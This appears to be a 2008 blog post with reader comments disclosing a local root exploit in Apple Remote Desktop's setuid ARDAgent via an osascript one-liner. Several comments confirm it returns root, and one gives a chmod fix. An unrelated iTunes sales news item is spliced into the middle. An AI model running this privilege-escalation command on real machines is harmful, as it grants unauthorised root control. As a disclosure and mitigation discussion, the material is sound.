There’s currently a serious problem with Apple Remote Desktop. It can be used to gain root privileges without having actual permission to do so. All you need to do is ask it nicely to do something nasty using AppleScript.
osascript -e ‘tell app “ARDAgent” to do shell script “whoami”’;
Voila! The shell script in question is run as root. No authentication required. This exploit requires physical access to the machine in question. That’s of some comfort, but not a huge amount. This is a foolish feature of ARD’s AppleScript support.
Generally you have worse things to worry about if someone has physical access to your computer, but this needs to be fixed nonetheless. You can actually protect yourself by archiving and removing ARD (located in /System/Library/CoreServices/RemoteManagement/).
Let’s hope Apple fixes this in a security update soon.
Apple has Sold Over 5 Billion Songs on iTunes
Thursday June 19, 2008 10:07 AM EST
Written by arn
Apple announced today that they had sold over 5 billion songs on iTunes. According to data from the NPD Group, iTunes remains the number one music retailer in the US. iTunes features the largest online music catalog with over eight million songs.
From Macrumors
Apple also reveals that customers are buying and renting over 50,000 movies every day making iTunes the most popular online movie store as well. iTunes now houses over 20,000 TV episodes and over 2,000 films including over 350 in high definition.
Apple first reported it had become the number one music retailer in the U.S. in April.
MacRumors.com
Please clarify this command. I've run it repeatedly on multiple machines running both Tiger and Leopard, PowerPC and Intel, Server and Client, and I cannot get it to execute. I get the following error: ARDAgent got an error: "whoami" doesn't understand the do shell script message. (-1708)
This is after I've cleaned up the example which contains smart quotes. If this exploit is proven, I want to file a bug but if I can't duplicate it, I'll be wasting my time.
I do not buy this. i tried it and it didn't work.
you cannot send unix commands to an ardclient unless you are authenticated AND you have ALL the check boxes checked for the user in question inside remote management under sharing pref pane.
if you have all the boxes checked the user can send unix commands as root even if its a standard user on the system. this may be the "security" problem you're actually referring to since a std user will have root access over a network instead of the std. user rights the user has a the box itself.
here's the thing though, in order for the std user to get this access an admin user has to grant it by checking all the boxes under remote management. a std. user cannot set this. if an admin user is ignorant it is a problem but otherwise it is not.
in my opinion there should be a warning to the admin for allowing this access as a std. user but it should be allowed.
It does work.
$ uname -a
Darwin mymac.local 9.3.0 Darwin Kernel Version 9.3.0: Fri May 23 00:49:16 PDT 2008; root:xnu-1228.5.18~1/RELEASE_I386 i386 i386
$ osascript -e 'tell app "ARDAgent" to do shell script "whoami"';
root
That's on Mac OS X 10.5.3
I've managed to sort this out and if someone has physical access to the machine with an active login session, this exploit does execute as advertised.
Remote Management must be disabled in order for this to work. I applied all updates to a Tiger machine, restarted, and entered the osascript as described above. The response was "root". Not good. I then created a second non-admin account, ran the command, and again could execute the script with root privileges. It's time to file my bug.
Works for me.
osascript -e 'tell app "ARDAgent" to do shell script "echo Mwahahah"'
duel, you can not believe it but I just tried it on my Leopard MBP and I get the following:
In the script editor:
tell application "ARDAgent" to do shell script "whoami;id"
result:
"root
uid=0(root) gid=0(wheel) egid=502(_myusrname) groups=0(wheel),1(daemon),8(procview),2(kmem),29(certusers),3(sys),9(procmod),4(tty),5(operator),80(admin),20(staff),101(com.apple.sharepoint.group.1)"
This is the easiest local root exploit I've ever seen. Beware.
I was able to reproduce this without having any of the "Sharing" services enabled. The problem is that the ARDAgent executable has the UNIX "s" permission set, meaning that when the program is executed it will run as the "owner" of the file rather than the current user. Some programs require this permission to work, but they should be hardened against allowing arbitrary command execution which is not the case with ARDAgent.
If you don't need Remote Management an easy fix is the remove the "s" permission:
$ osascript -e 'tell app "ARDAgent" to do shell script "whoami"';
root
$ sudo chmod u-s /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/MacOS/ARDAgent
Password:
$ osascript -e 'tell app "ARDAgent" to do shell script "whoami"';
mgood